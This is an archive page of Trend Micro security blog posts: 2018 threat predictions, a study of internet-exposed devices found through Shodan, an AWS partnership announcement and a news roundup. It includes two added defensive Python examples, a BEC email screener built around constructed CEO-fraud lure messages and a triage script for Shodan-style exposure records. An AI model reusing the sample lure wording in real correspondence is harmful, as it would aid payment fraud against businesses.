Category Archives: Trend Micro


Security Predictions for 2018 Paradigm Shifts

Category : Trend Micro

Skills and resources — these are the two elements that make up an attacker’s arsenal. An attacker, however, cannot set out to break security or even perform sophisticated attacks without finding weak points in a system first. Massive malware attacks, email-borne heists, hacked devices, and disrupted services — all of these require a vulnerability in the network, whether in the form of technology or people, in order to be pulled off.

Increased connectivity and interaction over insecure networks are a given. Unfortunately, poor implementation of technologies adds to the likelihood of threats being realized. Having protection where and when it’s needed will become the backbone of security in this ever-shifting threat landscape.

In 2018, digital extortion will be at the core of most cybercriminals’ business model and will propel them into other schemes that will get their hands on potentially hefty payouts. Vulnerabilities in IoT devices will expand the attack surface as devices get further woven into the fabric of smart environments everywhere. Business Email Compromise scams will ensnare more organizations to fork over their money. The age of fake news and cyberpropaganda will persist with old-style cybercriminal techniques. Machine learning and blockchain applications will pose both promises and pitfalls. Companies will face the challenge of keeping up with the directives of the General Data Protection Regulation (GDPR) in time for its enforcement. Not only will enterprises be riddled with vulnerabilities, but loopholes in internal processes will also be abused for production sabotage.

These are the threats that will make inroads in the 2018 landscape. As such, they will serve as further proof that the days of threats being addressed with traditional security solutions are behind us. As environments become increasingly interconnected and complex, threats are redefining how we should look at security.

Trend Micro has looked into the current and emerging threats, as well as the security approaches tailored for the landscape. Read on to find out how to make informed decisions with regard to the security focus areas that will figure prominently in 2018.


For 2017, we predicted that cybercriminals would diversify ransomware into other attack methods. True enough, the year unfolded with incidents such as WannaCry and Petya’s rapidly propagated network attacks, Locky and FakeGlobe’s widespread spam run, and Bad Rabbit’s watering hole attacks against Eastern European countries.

We do not expect ransomware to go away anytime soon. On the contrary, it can only be anticipated to make further rounds in 2018, even as other types of digital extortion become more prevalent. Cybercriminals have been resorting to using compelling data as a weapon for coercing victims into paying up. With ransomware-as-a-service (RaaS) still being offered in underground forums, along with bitcoin as a secure method to collect ransom, cybercriminals are being all the more drawn to the business model.

Ransomware maturity as a catalyst for digital extortion campaigns

If the evolution of cybercriminal tactics over the years is any indication, cybercriminals are now going straight for the money instead of tricking users into giving up their credentials. The early online threats were heavy on infostealers and malware that hijacked banking transactions to steal private information. Then, the breed of threats went out to disguise themselves as anti-malware solutions (FAKEAV), whereby users were duped into downloading the software and paying up to regain access to the victimized computers. Emulating this behavior of FAKEAV, ransomware took the stage from then on.

The current success of ransomware campaigns — especially their extortion element — will prompt cybercriminals looking to make generous profits out of targeting populations that will yield the most return possible. Attackers will continue to rely on phishing campaigns where emails with ransomware payload are delivered en masse to ensure a percentage of affected users. They will also go for the bigger buck by targeting a single organization, possibly in an Industrial Internet of Things (IIoT) environment, for a ransomware attack that will disrupt the operations and affect the production line. We already saw this in the fallout from the massive WannaCry and Petya outbreaks, and it won’t be long until it becomes the intended impact of the threat.

Extortion will also come into play when GDPR gets imposed. Cybercriminals could target private data covered by the regulation and ask companies to pay an extortion fee rather than risk punitive fines of up to 4 percent of their annual turnover. Companies will have ransom prices associated with them that cybercriminals can determine by taking publicly available financial details and working out the respective maximum GDPR fines the companies could face. This will drive an increase in breach attempts and ransom demands. Moreover, we expect GDPR to be used as a social engineering tactic in the same way that copyright violations and police warnings were used in past FAKEAV and ransomware campaigns.

Users and enterprises can stay resilient against these digital extortion attempts by employing effective web and email gateway solutions as a first line of defense. Solutions with high-fidelity machine learning, behavior monitoring, and vulnerability shielding prevent threats from getting through to the target. These capabilities are especially beneficial in the case of ransomware variants that are seen moving toward fileless delivery, in which there are no malicious payloads or binaries for traditional solutions to detect.


The massive Mirai and Persirai distributed denial-of-service (DDoS) attacks that hijacked IoT devices, such as digital video recorders (DVRs), IP cameras, and routers, have already elevated the conversation of how vulnerable and disruptive these connected devices can be. Recently, the IoT botnet Reaper, which is based on the Mirai code, has been found to catch on as a means to compromise a web of devices, even those from different device makers.

We predict that aside from performing DDoS attacks, cybercriminals will turn to IoT devices for creating proxies to obfuscate their location and web traffic, considering that law enforcement usually refers to IP addresses and logs for criminal investigation and post-infection forensics. A large network of anonymized devices (running on default credentials, no less, and keeping virtually no logs) could serve as jumping-off points for cybercriminals to surreptitiously facilitate their activities within the compromised network.

We should also anticipate more IoT vulnerabilities in the market as many, if not most, manufacturers are going to market with devices that are not secure by design. This risk will be compounded by the fact that patching IoT devices may not be as simple as patching PCs. It can take one insecure device that has not been issued a fix or updated to the latest version to become an entry point to the central network. The KRACK attack proved that even the wireless connection itself could add to the security woes. This vulnerability affects most, if not all, devices that connect to the WPA2 protocol, which then raises questions about the security of 5G technology, which is slated to sweep connected environments.

Devices that will be targeted for disruptions and cybercrime

With hundreds of thousands of drones entering the U.S. airspace alone, the prospect of overseeing the aerial vehicles can be daunting. We expect that reports of drone-related accidents or collisions are only the start of it, as hackers have already been found to access computers, grab sensitive information, and hijack deliveries. Likewise, pervasive home devices such as wireless speakers and voice assistants can enable hackers to determine house locations and attempt break-ins.

We also expect cases of biohacking, via wearables and medical devices, to materialize in 2018. Biometric activity trackers such as heart rate monitors and fitness bands can be intercepted to gather information about the users. Even life-sustaining pacemakers have been found with vulnerabilities that can be exploited for potentially fatal attacks. What adopters and regulators should recognize now is that not all IoT devices have built-in security, let alone hardened security. The devices are open to compromise unless manufacturers perform regular risk assessments and security audits. Users are also responsible for setting up their devices for security, which can be as simple as changing default passwords and regularly installing firmware updates.


According to the Federal Bureau of Investigation (FBI), BEC scams have been reported in over a hundred countries and have a marked increase of 2,370 percent in identified exposed losses between January 2015 and December 2016. This isn’t surprising since BEC scams are to cybercriminals what burglary is to “offline” criminals. BEC scams are quick, require very little scouting, and can yield big gains depending on the target, as evidenced by the US$5 billion recorded losses.

We predict that BEC incidents will only multiply in 2018, leading to more than US$9 billion* in global losses. This hike in the projected reported losses will be brought on partly by a growing awareness around BEC and the tactics used, which will result in better identification and increased reporting of the scams. Mainly, it will be rooted in how BEC scams bank on phishing approaches that time and again have proved to be effective. We will continue to see BEC scams that involve company executives being impersonated to wire sums of money. We’ve been observing it in the increase of BEC attack attempts involving CEO fraud. It’s also interesting to note that instead of planting keyloggers, BEC scammers are turning to phishing PDFs and sites, which are cheaper than keyloggers with crypting services. With phishing, they can still compromise accounts, and at lower costs at that.

The simplicity of knowing a target organization’s hierarchy (which may even be publicly available on social media and corporate websites) and the brevity of the emails make a case for an efficient ploy to funnel money. There is, however, another financially driven enterprise threat expected to still be wielded by cybercriminals who are willing to do the long con: Business Process Compromise (BPC). With BPC, cybercriminals learn the inner workings of the organization, particularly in the financial department, with the aim of modifying internal processes (possibly via corporate supply chain vulnerabilities) and hitting the mother lode. However, given that it requires long-term planning and more work, BPC is less likely to make headlines in 2018, unlike the much simpler BEC.

BEC can be deflected if employee training is in place, as it is reliant on social engineering. Companies should implement strict protocols on internal processes, especially when making any kind of transaction. Small- and medium-sized businesses, as well as enterprises, should employ multiple verifications, whereby another established communication channel, such as a phone call, is at one’s disposal for double-checking. Web and gateway solutions that provide accurate detection of social engineering tactics and forged behaviors may also be able to block BEC threats.

*US$9 billion is based on computing the monthly average of reported losses from June to December 2016 and multiplying it by 12. This only assumes that there is a flat growth for reported BEC incidents and victims.
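The defensive checks described above (verifying who really sent a request, and treating executive impersonation plus urgent payment language as a warning sign) can be automated at the mail gateway. The following is an added example, not Trend Micro's code: a small screening heuristic that flags display-name spoofing of known executives, lookalike sender domains, mismatched Reply-To headers and urgent-payment wording. The corporate domain `example.com`, the executive directory and the three messages are constructed for illustration.

```python
"""Heuristic screening for Business Email Compromise (BEC) lures.

Added example for this post, not Trend Micro's code. The executive
directory, the corporate domain and the sample messages are constructed.
"""
import re
from email.utils import parseaddr

CORP_DOMAIN = "example.com"                        # assumed corporate domain
EXECUTIVES = {"jane doe": "jane.doe@example.com"}  # assumed directory: display name -> real mailbox

URGENCY = re.compile(r"\b(urgent|immediately|asap|today|confidential)\b", re.I)
PAYMENT = re.compile(r"\b(wire|transfer|payment|invoice|bank details|gift cards?)\b", re.I)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot domains one or two characters away from ours."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(domain: str) -> bool:
    """True for near-miss registrations such as examp1e.com or example-corp.com."""
    if domain == CORP_DOMAIN or domain.endswith("." + CORP_DOMAIN):
        return False
    base = CORP_DOMAIN.split(".")[0]
    return levenshtein(domain, CORP_DOMAIN) <= 2 or base in domain


def assess(msg: dict) -> list:
    """Return the BEC indicators found in one message (empty list = nothing suspicious)."""
    reasons = []
    name, addr = parseaddr(msg["from"])
    from_domain = addr.rsplit("@", 1)[-1].lower()
    name_key = name.strip().lower()
    # Display name of a known executive, but the address is not that executive's mailbox.
    if name_key in EXECUTIVES and addr.lower() != EXECUTIVES[name_key]:
        reasons.append("display name matches an executive but address does not")
    if is_lookalike(from_domain):
        reasons.append(f"sender domain {from_domain} looks like {CORP_DOMAIN}")
    # Replies silently routed to a third domain are typical of CEO-fraud lures.
    reply_to = parseaddr(msg.get("reply-to", ""))[1]
    if reply_to and reply_to.rsplit("@", 1)[-1].lower() != from_domain:
        reasons.append("Reply-To points to a different domain than From")
    text = msg["subject"] + " " + msg["body"]
    if URGENCY.search(text) and PAYMENT.search(text):
        reasons.append("urgent payment language")
    return reasons


def screen(messages: list) -> list:
    """(index, indicators) for every message carrying two or more indicators."""
    flagged = []
    for i, msg in enumerate(messages):
        reasons = assess(msg)
        if len(reasons) >= 2:
            flagged.append((i, reasons))
    return flagged


# Constructed sample traffic: one legitimate internal mail and two lures.
SAMPLE_MESSAGES = [
    {"from": "Jane Doe <jane.doe@example.com>", "subject": "Q3 numbers",
     "body": "Attached are the figures we discussed."},
    {"from": "Jane Doe <jane.doe@freemail.invalid>", "reply-to": "ceo.office@other.invalid",
     "subject": "Urgent wire",
     "body": "I need you to process a wire transfer today. Keep it confidential."},
    {"from": "Accounts <ap@examp1e.com>", "subject": "Invoice overdue",
     "body": "Please send payment immediately to the updated bank details."},
]

if __name__ == "__main__":
    for index, reasons in screen(SAMPLE_MESSAGES):
        print(f"message {index}: " + "; ".join(reasons))
```

Two or more indicators is the threshold used here so that a genuine executive asking for an invoice to be paid today is not blocked on wording alone; a flagged message is a candidate for the out-of-band phone verification the post recommends, not an automatic rejection.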


The fake news triangle consists of: motivations the propaganda is built on, social networks that serve as a platform for the message, and tools and services that are used to deliver the message. In 2018, we expect cyberpropaganda to spread via familiar techniques: those that were once used to spread spam via email and the web.

Do-it-yourself (DIY) kits in the form of software, for instance, can perform automated social media spamming. Even black hat search engine optimization (SEO) has been adapted to social media optimization (SMO), with a user base of hundreds of thousands able to provide traffic and numbers to different platforms. From spear-phishing emails sent to foreign ministries to the blatant use of documents to discredit authorities, dubious content can spread freely and spark forceful opinions or even real protests.

Fabricated information, additionally, can put businesses in a bad light and even hurt their performance and reputation. Researchers are even looking into audio and video manipulation tools that allow realistic-looking footage to further blur the line between authentic and fake. Manipulated political campaigns will continue to mount smear tactics and deliberately shift public perception, as allowed by the tools and services readily available in underground marketplaces.

It is likely that the upcoming Swedish general election will not be exempt from attempts to influence the voting outcome through fake news. The interest will also be hot on the heels of the U.S. midterm elections, as social media can be wielded to amplify divisive messages, as in the alleged meddling in the previous U.S. presidential election and the “troll farm” behind a Twitter influencer.

Each time fake news gets posted and reposted, a reader encountering the same content grows familiar with it and takes it as truth. Having the eye to distinguish fake news from real will be tough, as propagandists use old techniques that have proved effective and reliable.

Fake news and cyberpropaganda will press on because there has been no dependable way to detect or block manipulated content. Social media sites, most notably Google and Facebook, have already pledged a crackdown on bogus stories propagating across feeds and groups, but it has had little impact so far. That being the case, the final screening will still be dependent on the users themselves. But as long as users are not educated in flagging false news, such content will continue to permeate online and be consumed by unsuspecting and undiscerning readers.


Knowing what is unknown. That’s one of the key promises of machine learning, the process by which computers are trained but not deliberately programmed. For a relatively nascent technology, machine learning shows great potential. Already, however, it’s become apparent that machine learning may not be the be-all and end-all of data analysis and insights identification. Machine learning lets computers learn by being fed loads of data. This means that machine learning can only be as good and accurate as the context it gets from its sources.

Going into the future, machine learning will be a key component of security solutions. While it uncovers a lot of potential for more accurate and targeted decision-making, it poses an important question: Can machine learning be outwitted by malware?

We’ve found that the CERBER ransomware uses a loader that certain machine learning solutions aren’t able to detect because of how the malware is packaged to not look malicious. This is especially problematic for software that employs pre-execution machine learning (which analyzes files without any execution or emulation), as in the case of the UIWIX ransomware (a WannaCry copycat), where there was no file for pre-execution machine learning to detect and block.

Machine learning may be a powerful tool, but it is not foolproof. While researchers are already looking into the possibilities of machine learning in monitoring traffic and identifying possible zero-day exploits, it is not far-fetched to conjecture that cybercriminals will use the same capability to get ahead of finding the zero-days themselves. It is also possible to deceive machine learning engines, as shown in the slight manipulation of road signs that were recognized differently by autonomous cars. Researchers have already demonstrated how machine learning models have blind spots that adversaries can probe for exploitation.

While machine learning definitely helps improve protection, we believe that it should not completely take over security mechanisms. It should be considered an additional security layer incorporated into an in-depth defense strategy, and not a silver bullet. A multilayered defense with end-to-end protection, from the gateway to the endpoint, will be able to fight both known and unknown security threats.

Another emerging technology that is poised to reshape businesses and that we see being abused is the blockchain. Blockchain technology has generated a lot of buzz in the context of digital cryptocurrencies and as a form of no-fail security. Adoption of the decentralized ledger is projected to be widespread in five to 10 years. Currently, however, many initiatives are already being built on blockchain, ranging from technology and finance industry startups and giants to entire governments – all with the goal of revolutionizing business models.

Blockchain works by having a required consensus among the participants, which makes unauthorized changes or deliberate tampering with the blockchain difficult to do. The more transfers there are, the more the series becomes complex and obfuscated. This obfuscation, likewise, can be seen as an opportunity by cybercriminals looking into enhancing their attack vectors. They have already managed to target the blockchain in the Ethereum DAO hack, which led to over US$50 million worth of digital currency lost.

Like most promising technologies that were thought secure at one point, machine learning and blockchain warrant close attention.


The European Union (EU) will finally be rolling out GDPR in May 2018, with an expected extensive impact on data handling of companies that engage with EU citizens’ data – even if the said companies are outside Europe. In our research, we found that the majority of C-level executives (in 57 percent of businesses) shun the responsibility of complying with GDPR, with some unaware of what constitutes personally identifiable information (PII) and even unbothered by potential monetary penalties.

Laggards will fully heed the brunt of GDPR only when the retributions are imposed by the regulators. Data privacy watchdogs can interfere with business operations by altogether banning companies from processing certain data. There is also the possibility that lawsuits, both from the authorities and from the citizens themselves, will come into the picture.

The American credit reporting agency Equifax, for instance, would have faced a staggering fine, as some U.K. consumers were reportedly affected too, if the breach had happened after the GDPR implementation had gone into effect and it hadn’t come forward with the incident sooner than it chose to. A considerable penalty would have also been imposed on the international ride-hailing company Uber, which announced a data breach over a year after the fact. Noncompliance with breach notification will prompt regulators to issue fines of up to €20 million, or up to 4 percent of the company’s global annual turnover of the preceding financial year, whichever is greater.

Companies waking up to the GDPR enforcement, therefore, will find the importance of having a dedicated data protection officer (DPO) who can spearhead data processing and monitoring. DPOs are particularly needed in enterprises and industries that handle sensitive data. Companies will be required to review their data security strategy, including classifying the nature of data and distinguishing EU data from data associated with the rest of the world.

Other regions will have to catch up with their data regulations by having a similar framework of wide-ranging scope and tougher penalties for compliance failure. The U.S. Food and Drug Administration (FDA) has already recognized several European drug regulatory authorities to improve its inspections. Australia is gearing up to enact its own data breach notification laws based on the Privacy Amendment (Notifiable Data Breaches) Act 2017, while U.K.’s Data Protection Bill is getting updated to match EU’s laws after Brexit. Meanwhile, the EU-U.S. Privacy Shield deal will have to prove how binding it is in spite of concerns expressed by the EU.


In today’s environment, where the Industry 4.0 makes cyber-physical systems and production processes increasingly interconnected and software-defined, risks can stem from several areas within. The notion of having a digital twin, a virtual replica or simulation of the real-world production or process, is enabling enterprises to address performance issues that may arise in real physical assets. However, we believe that while it’s poised to transform operations, the production network can be infiltrated by malicious actors aiming to manipulate the system and cause operational disruptions and damages. By manipulating the digital twin itself, these actors can make production processes look legitimate when they have, in fact, been modified.

In addition, production data that is directly (or indirectly) handed over via manufacturing execution systems (MES) to SAP or other enterprise resource planning (ERP) systems is also in danger of being compromised. If a manipulated piece of data or wrong command is sent to an ERP system, machines will be liable to sabotage processes by carrying out erroneous decisions, such as delivery of inaccurate numbers of supplies, unintended money transfers, and even system overloads.

Enterprise systems will not be the only ones targeted; in 2018, we expect to continue to see security flaws in Adobe and Microsoft platforms. What’s going to be particularly interesting, however, is the renewed focus on browser-based and server-side vulnerabilities.

For years, the vulnerabilities of well-known browser plug-ins like Adobe Flash Player, Oracle’s Java, and Microsoft Silverlight have been targeted. We predict that in 2018, however, weaknesses in JavaScript engines will beset the modern browsers themselves. From Google Chrome’s V8 crashing issues to Microsoft Edge’s Chakra being open source, JavaScript-based browser vulnerabilities will make more appearances in 2018 given the wide use of the script on the web.

Attackers will also take a renewed focus on using server-side vulnerabilities to deliver malicious payloads. We predict that the use of Server Message Block (SMB) and Samba exploits that deliver ransomware will be more pronounced in 2018. SMB vulnerabilities, in particular, can be exploited without any direct interaction with the user. In fact, an SMB vulnerability was used in the EternalBlue exploit that crippled many networks running on Windows during the WannaCry and Petya ransomware attacks, and in the more recent Bad Rabbit attacks that exploited EternalRomance. Samba, the open-source SMB implementation on Linux, is similarly exposed to vulnerabilities in the SMB protocol.

Attacks against production processes through SAP and ERP mean that enterprises will need to take the security of related applications as priority. Access to the applications will need to be managed and monitored to avoid any unauthorized access.

Users and enterprises are advised to routinely check for software updates and apply patches once they are available. However, as administrators can stumble over immediate deployment of updates, we recommend integrating vulnerability shielding into systems so that platforms are protected against unpatched and zero-day vulnerabilities. Network solutions should also secure connected devices from potential intrusions through virtual patching and proactive monitoring of web traffic.

Tackling Security in 2018

Given the broad range of threats the landscape currently bears and can be expected to face in 2018 – from vulnerabilities and ransomware to spam and targeted attacks – the best that enterprises and users alike can do is to minimize the risk of compromise at all layers.

Better visibility and multilayered security defense for enterprises

To combat today’s expansive threats and be fortified against those yet to come, organizations should employ security solutions that allow visibility across all networks and that can provide real-time detection and protection against vulnerabilities and attacks. Any potential intrusions and compromise of assets will be avoided with a dynamic security strategy that employs cross-generational techniques appropriate for varying threats. These security technologies include:

  • Real-time scanning. Active and automatic scans allow highly efficient malware detection and improved machine performance.
  • Web and file reputation. Malware detection and prevention through web reputation, anti-spam techniques, and application control protect users from ransomware attacks and exploits.
  • Behavioral analysis. Advanced malware and techniques that evade traditional defenses are proactively detected and blocked.
  • High-fidelity machine learning. Human inputs augmented with threat intelligence data allow rapid detections and accurate defenses against known and unknown threats.
  • Endpoint security. Security that employs sandboxing, breach detection, and endpoint sensor capabilities detects suspicious activities and prevents attacks and lateral movement within the network.

Best practices and sustained protection for end-users

Having different devices and applications to access information is becoming second nature in today’s increasingly connected world. Regardless of device, application, or network, users will be able to fill the security gaps with proper configurations:

Change default passwords. Use unique and complex passwords for smart devices, especially for routers, to significantly reduce the possibility of attackers hacking into the devices.

Set up devices for security. Modify devices’ default settings to keep privacy in check and implement encryption to prevent unauthorized monitoring and use of data.

Apply timely patches. Update the firmware to its latest version (or enable the auto-update feature if available) to avoid unpatched vulnerabilities.

Deflect social engineering tactics. Always be mindful of emails received and sites visited as these can be used for spam, phishing, malware, and targeted attacks.

Enterprises and users are better positioned if protections in place are able to cover the entire threat life cycle with multiple security layers. From the email and web gateway to the endpoint, having a connected threat defense ensures maximum protection against the constantly evolving threats of 2018 and beyond.



Cities Exposed in Shodan


Western European, UK, French, German, and US cities exposed. Are your connected devices searchable on the internet? Find out what you are risking.

Shodan Reveals Exposed Cyber Assets

Using Shodan data, the Trend Micro Forward-looking Threat Research (FTR) team assessed which types of cyber assets found in cities across the globe are the most exposed. When a cyber asset like a webcam or a printer is searchable, threat actors can look for means to compromise the device or find out whether the device itself or its software version is known to be vulnerable. Affected parties can use the results of our research to justify investments such as the implementation of the necessary security measures that will better protect their data and assets from future compromise.

What is Shodan?

Shodan is an online search engine that catalogs cyber assets or internet-connected devices. Shodan finds and lists devices and systems such as webcams, baby monitors, medical equipment, industrial control system (ICS) devices, home appliances, and databases, among others. Shodan collates and makes searchable both device metadata and banner information that internet-connected devices and systems are freely sharing over the public internet—and with anyone who queries them.

What are exposed cyber assets?

We define “exposed cyber assets” as internet-connected devices and systems that are discoverable on Shodan or similar search engines, and can be accessed via the public internet. When a certain device or protocol is exposed, it does not necessarily mean that the cyber asset is automatically vulnerable or compromised.

However, since an exposed device is searchable and visible to the public, attackers can take advantage of the available information on Shodan in order to mount an attack. For instance, an attacker may check if the associated software of a device is vulnerable, or if the admin console’s password is easy to crack.

Cities Exposed Worldwide

We have looked at different developed countries in the world to see whether exposure levels differ across countries and in what ways. We have been able to analyze the exposed cyber assets in the United States, Western Europe as a region, the United Kingdom, France, and Germany.

Western European Cities Exposed

We presented data on exposed cyber assets in the top 10 most populous cities in Western Europe—London, Berlin, Athens, Madrid, Rome, Paris, Stockholm, Oslo, Amsterdam and Lisbon. London and Berlin had more than 2.5 million exposed systems while Amsterdam and Madrid had numbers in the region of a million.

US Cities Exposed

We presented data on exposed cyber assets in the top 10 largest U.S. cities by population—New York City, Los Angeles, Chicago, Houston, Philadelphia, Phoenix, San Antonio, San Diego, Dallas, and San Jose. Los Angeles, Houston, Chicago, and Dallas each had more than 2 million exposed cyber assets that make them vulnerable to exploitation and compromise.

For each research project, we answered the following questions:

  • Which capital or city has the most number of exposed cyber assets?
  • What are the most common connections, operating systems, and exposed and vulnerable products/software and device types in this country/region?

Then for each capital or city, we drilled down to analyze:

  • Different exposed device types such as webcams, network-attached storage (NAS) devices, routers, printers, Voice over IP (VoIP) phones, and media recording devices
  • Different exposed web services like email databases and other database types like MySQL, PostgreSQL, CouchDB, and MongoDB
  • Different exposed services like NTP, UPnP, SNMP, SSH, RDP, Telnet, and FTP
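The per-city drill-down above (device types, databases, management services, and whether a product version is current) can be reproduced by a defender over an export of their own organization's exposed assets. The following is an added example, not the FTR team's tooling: it triages banner records laid out like Shodan's JSON (`ip_str`, `port`, `transport`, `product`, `version`, `location.city`), assigns each a service family and a severity, compares versions against a patch baseline, and summarizes exposure per city. The severity ranking, the baseline versions and the six records are constructed assumptions, not vulnerability claims about any product.

```python
"""Triage of exposed-asset records in the style of a Shodan export.

Added example for this post, not the FTR team's own tooling. Field names
follow Shodan's banner JSON; the rules and sample records are this
example's own assumptions.
"""
from collections import Counter, defaultdict

# Service families named in the post, keyed by the port Shodan reports.
# Severity is an assumption: cleartext remote management and databases
# reachable from the internet are treated as the most urgent to fix.
PORT_RULES = {
    21: ("FTP", "high"), 23: ("Telnet", "high"), 3389: ("RDP", "high"),
    27017: ("MongoDB", "high"), 3306: ("MySQL", "high"),
    5432: ("PostgreSQL", "high"), 5984: ("CouchDB", "high"),
    22: ("SSH", "medium"), 161: ("SNMP", "medium"),
    1900: ("UPnP", "medium"), 123: ("NTP", "medium"),
}
# Substrings of the product banner that identify a device type from the post.
DEVICE_HINTS = {"webcam": "webcam", "ip camera": "webcam", "nas": "NAS",
                "printer": "printer", "router": "router",
                "voip": "VoIP phone", "dvr": "media recorder"}
# Placeholder minimum versions an organization might set for itself (assumption).
PATCH_BASELINE = {"OpenSSH": (7, 4), "MongoDB": (3, 6)}


def classify(record: dict) -> tuple:
    """Return (label, severity) for one banner record."""
    product = (record.get("product") or "").lower()
    for hint, label in DEVICE_HINTS.items():
        if hint in product:
            return (label, "high")   # an internet-facing device console is always a finding
    return PORT_RULES.get(record.get("port"), ("other", "low"))


def version_tuple(version: str) -> tuple:
    """'7.9p1' -> (7,) ; '3.2.1' -> (3, 2, 1): numeric components only."""
    return tuple(int(p) for p in version.split(".") if p.isdigit())


def outdated(record: dict) -> bool:
    """True when the banner version is below the baseline for that product."""
    product = record.get("product") or ""
    version = record.get("version")
    if product not in PATCH_BASELINE or not version:
        return False                 # unknown product or no version: cannot judge
    return version_tuple(version) < PATCH_BASELINE[product]


def summarize(records: list) -> dict:
    """city -> Counter of severities, the per-city view used in the post."""
    per_city = defaultdict(Counter)
    for rec in records:
        city = rec.get("location", {}).get("city", "unknown")
        per_city[city][classify(rec)[1]] += 1
    return per_city


def most_exposed_city(records: list) -> str:
    """City with the most high-severity exposed assets."""
    counts = summarize(records)
    return max(counts, key=lambda city: counts[city]["high"])


# Constructed sample export; 203.0.113.0/24 is a documentation range.
SAMPLE_RECORDS = [
    {"ip_str": "203.0.113.10", "port": 23, "transport": "tcp", "product": None,
     "data": "login: ", "location": {"city": "London"}},
    {"ip_str": "203.0.113.11", "port": 27017, "transport": "tcp", "product": "MongoDB",
     "version": "3.2.1", "location": {"city": "London"}},
    {"ip_str": "203.0.113.12", "port": 22, "transport": "tcp", "product": "OpenSSH",
     "version": "7.9", "location": {"city": "Berlin"}},
    {"ip_str": "203.0.113.13", "port": 80, "transport": "tcp",
     "product": "Generic IP Camera", "location": {"city": "Madrid"}},
    {"ip_str": "203.0.113.14", "port": 123, "transport": "udp", "product": "ntpd",
     "location": {"city": "Berlin"}},
    {"ip_str": "203.0.113.15", "port": 8080, "transport": "tcp", "product": "Apache httpd",
     "version": "2.4.29", "location": {"city": "Madrid"}},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        label, severity = classify(rec)
        flag = " (below patch baseline)" if outdated(rec) else ""
        print(f"{rec['ip_str']}:{rec['port']} {label} [{severity}]{flag}")
    print(dict(summarize(SAMPLE_RECORDS)), "most exposed:", most_exposed_city(SAMPLE_RECORDS))
```

Port-based rules are the weak part of this triage: a service moved to a non-standard port is missed, and a product string is only as reliable as the banner the device chose to send, which is why the post stresses that exposure is a prompt to investigate rather than proof of compromise.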

Lastly, we also went into detail about what home office owners and enterprise network defenders can do to safeguard their networks from attacks that different threat actors can launch.




Trend Micro Enhances Cloud Security Through Integration with AWS Security Services


Trend Micro Incorporated, a global leader in cybersecurity solutions, today announced that they are one of the first companies for Enterprise Contracts for AWS Marketplace, a provider of rules for the newly launched Amazon Web Services (AWS) Web Application Firewall (WAF) Managed Rules Partner Program, and a new integration with Amazon GuardDuty.

Enterprise Contracts for AWS Marketplace defines a set of standardized contract terms across multiple software vendors to simplify and speed procurement.

“AWS Marketplace is simplifying the enterprise software procurement experience to accelerate customer innovation,” said Dave McCann, Vice President of AWS Marketplace and Catalog Services, Amazon Web Services, Inc. “Trend Micro is a valued AWS Marketplace seller that embraces customer feedback to drive their innovation in product and business models. We are delighted to have them as one of the first companies for Enterprise Contract for AWS Marketplace.”

Through cooperation with AWS, Trend Micro expects to deliver application protection rules as part of the new AWS WAF Managed Rules Partner Program. This brings proven vulnerability research and protection to better secure applications and data deployed on the cloud.

Cloud workload automation is necessary to make data management scalable across enterprise ecosystems. Trend Micro’s integration with Amazon GuardDuty allows users to take advantage of the security findings from Amazon GuardDuty to make even smarter decisions with their Amazon Elastic Compute Cloud (Amazon EC2) and Amazon EC2 Container Service (Amazon ECS) workloads. This automated workflow increases visibility and reduces the operational overhead, saving builders time.

“We are proud to provide an extra layer of protection to the innovative applications that AWS builders are deploying on the cloud,” said Kevin Simzer, EVP at Trend Micro. “Our collaboration with AWS allows us to deliver scalable security that removes friction from procurement, devops lifecycle and day-to-day operations.”

Since 2012, Trend Micro has been dedicated to safeguarding customers’ cloud environments across a wide variety of industry verticals, including healthcare organizations, governments and financial services. Trend Micro is also an Advanced tier Technology Partner in the AWS Partner Network (APN), an AWS Security Competency Partner and an AWS Marketplace seller.

For those attending AWS re:Invent 2017, please visit the Trend Micro booth (#1812) during the show to learn more or find out more online at


The Week in Security Week

Category : Trend Micro

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.

Below you’ll find a quick recap of topics followed by links to news articles and/or our blog posts providing additional insight. Be sure to check back each Friday for highlights of the goings-on each week!

Coupon Fraud Could be Costing Your Business Millions

There is a dark side to couponing: fraud. While seemingly a mild form of fraud, wide-spread coupon fraud can add up. PennLive put realistic estimates of coupon crime costs between $300 – 600 million per year in the U.S. While losses will vary per organization, this is still no small price to pay for any business.

Microsoft Just Fixed a 17 Year Old Security Flaw in Office

Since 2000, there’s been a vulnerable component in the equation editor, which allows you to insert complex mathematical expressions into your documents. It’s a feature most users never touch, but a well-executed attack could allow a hacker to launch malicious code on a vulnerable machine.

New Banking Malware Variant Wants to Scoop up Your Email and Social Media Accounts

A sophisticated form of malware based on the notorious Zeus trojan and originally designed to steal banking credentials has returned with new espionage capabilities which allow it to monitor and modify Facebook and Twitter posts, as well as the ability to eavesdrop on emails.

New EMOTET Hijacks Windows API

Trend Micro recently discovered that EMOTET has a new iteration with a few changes in its usual behavior and new routines that allow it to elude sandbox and malware analysis. Based on its findings, EMOTET’s dropper changed from using RunPE to exploiting CreateTimerQueueTimer.

Cybercriminals Are Gaining Access to iCloud Accounts Through Phishing Emails

As Americans begin to worry more about cybercrime than the conventional kind, researchers warn users to remain cautious of both, as stolen iPhones are so valuable in criminal circles that they can go for as much as $2,100 in some countries.

Amazon Key Flaw Could Let Rogue Deliverymen Disable Your Camera

Security researchers have demonstrated that, with a simple program run from any computer in Wi-Fi range, the internet-enabled camera called Cloud Cam can be not only disabled but frozen: a viewer watching its live or recorded stream sees only a closed door, even as the actual door is opened.

IcedID Banking Trojan Targets US Financial Institutions

A new banking trojan called IcedID, spotted by researchers last September, has been wreaking havoc among financial institutions across the US, UK and Canada, including banks, payment card providers, mobile services providers, as well as e-commerce sites.

Trend Micro’s Capture the Flag Competition Provides Young Pros Real-World Experience

Young cybersecurity professionals need to overcome the gap between what is learned in a classroom and the practical experience required to protect real, critical business data. Trend Micro’s annual Capture the Flag (CTF) competition works to bridge this gap.

Budget for Cybersecurity in 2018

As Q4 begins in earnest, now is the time to start making considerations for next year’s budgets. This is especially true for the company’s IT and cyber security budgets – a difficult decision with so many robust technologies and new threats emerging. Check out top considerations for next year’s budget.

Pursue the Right to be Left Alone

